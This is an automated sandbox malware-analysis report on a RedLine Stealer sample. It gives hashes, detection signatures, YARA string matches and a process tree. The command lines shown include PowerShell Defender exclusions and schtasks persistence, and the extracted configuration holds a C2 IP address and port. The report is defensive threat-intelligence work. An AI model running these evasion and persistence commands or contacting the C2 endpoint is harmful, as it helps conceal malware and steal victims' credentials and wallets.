Edit tour

Windows Analysis Report
nzLoHpgAln.exe

Overview

General Information

Sample name:	nzLoHpgAln.exe renamed because original name is a hash value
Original sample name:	9f417a8434a3ea2932b0a23ebae7e7fa.exe
Analysis ID:	1583001
MD5:	9f417a8434a3ea2932b0a23ebae7e7fa
SHA1:	fcf9b06b8bbd53e0b230c04a99bcc4c8f3bcec2f
SHA256:	9632b0c0e242cef53b06a4e52dd154620184dded677e0a11be162278d8352b4e
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected RedLine Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

nzLoHpgAln.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\nzLoHpgAln.exe" MD5: 9F417A8434A3EA2932B0A23EBAE7E7FA)

powershell.exe (PID: 6660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7472 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 4296 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nzLoHpgAln.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\nzLoHpgAln.exe" MD5: 9F417A8434A3EA2932B0A23EBAE7E7FA)

conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wZWwzQVEakJvEU.exe (PID: 7408 cmdline: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe MD5: 9F417A8434A3EA2932B0A23EBAE7E7FA)

schtasks.exe (PID: 7680 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wZWwzQVEakJvEU.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe" MD5: 9F417A8434A3EA2932B0A23EBAE7E7FA)

conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.57.76:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x13b5a:$a4: get_ScannedWallets 0x129b8:$a5: get_ScanTelegram 0x137de:$a6: get_ScanGeckoBrowsersPaths 0x115fa:$a7: <Processes>k__BackingField 0xf50c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10f2e:$a9: <ScanFTP>k__BackingField
00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x17b3a:$a4: get_ScannedWallets 0x2f75a:$a4: get_ScannedWallets 0x16998:$a5: get_ScanTelegram 0x2e5b8:$a5: get_ScanTelegram 0x177be:$a6: get_ScanGeckoBrowsersPaths 0x2f3de:$a6: get_ScanGeckoBrowsersPaths 0x155da:$a7: <Processes>k__BackingField 0x2d1fa:$a7: <Processes>k__BackingField 0x134ec:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x2b10c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x14f0e:$a9: <ScanFTP>k__BackingField 0x2cb2e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x24f1b2:$a4: get_ScannedWallets 0x266fd2:$a4: get_ScannedWallets 0x27ebf2:$a4: get_ScannedWallets 0x24e010:$a5: get_ScanTelegram 0x265e30:$a5: get_ScanTelegram 0x27da50:$a5: get_ScanTelegram 0x24ee36:$a6: get_ScanGeckoBrowsersPaths 0x266c56:$a6: get_ScanGeckoBrowsersPaths 0x27e876:$a6: get_ScanGeckoBrowsersPaths 0x24cc52:$a7: <Processes>k__BackingField 0x264a72:$a7: <Processes>k__BackingField 0x27c692:$a7: <Processes>k__BackingField 0x24ab64:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x262984:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x27a5a4:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x24c586:$a9: <ScanFTP>k__BackingField 0x2643a6:$a9: <ScanFTP>k__BackingField 0x27bfc6:$a9: <ScanFTP>k__BackingField
Process Memory Space: nzLoHpgAln.exe PID: 6176	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nzLoHpgAln.exe PID: 6176	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: nzLoHpgAln.exe PID: 6176	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: nzLoHpgAln.exe PID: 6176	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x3903e:$a4: get_ScannedWallets 0x380f4:$a5: get_ScanTelegram 0x38d31:$a6: get_ScanGeckoBrowsersPaths 0x36fd3:$a7: <Processes>k__BackingField 0x345c2:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x36907:$a9: <ScanFTP>k__BackingField
Process Memory Space: nzLoHpgAln.exe PID: 7312	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nzLoHpgAln.exe PID: 7312	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: nzLoHpgAln.exe PID: 7312	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x13f803:$a4: get_ScannedWallets 0x13e6aa:$a5: get_ScanTelegram 0x13f48c:$a6: get_ScanGeckoBrowsersPaths 0x13d33d:$a7: <Processes>k__BackingField 0x13a870:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x13cc71:$a9: <ScanFTP>k__BackingField
Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x63a0:$a4: get_ScannedWallets 0x79edc:$a4: get_ScannedWallets 0x5247:$a5: get_ScanTelegram 0x78d83:$a5: get_ScanTelegram 0x6029:$a6: get_ScanGeckoBrowsersPaths 0x79b65:$a6: get_ScanGeckoBrowsersPaths 0x3eda:$a7: <Processes>k__BackingField 0x77a16:$a7: <Processes>k__BackingField 0x140d:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x74f49:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x380e:$a9: <ScanFTP>k__BackingField 0x7734a:$a9: <ScanFTP>k__BackingField
Process Memory Space: wZWwzQVEakJvEU.exe PID: 7732	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wZWwzQVEakJvEU.exe PID: 7732	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125bd:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
0.2.nzLoHpgAln.exe.3eccbe8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.nzLoHpgAln.exe.3eccbe8.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.nzLoHpgAln.exe.3eccbe8.2.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.nzLoHpgAln.exe.3eccbe8.2.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125bd:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.nzLoHpgAln.exe.3eccbe8.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
8.2.nzLoHpgAln.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.nzLoHpgAln.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
8.2.nzLoHpgAln.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
8.2.nzLoHpgAln.exe.400000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
8.2.nzLoHpgAln.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125bd:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
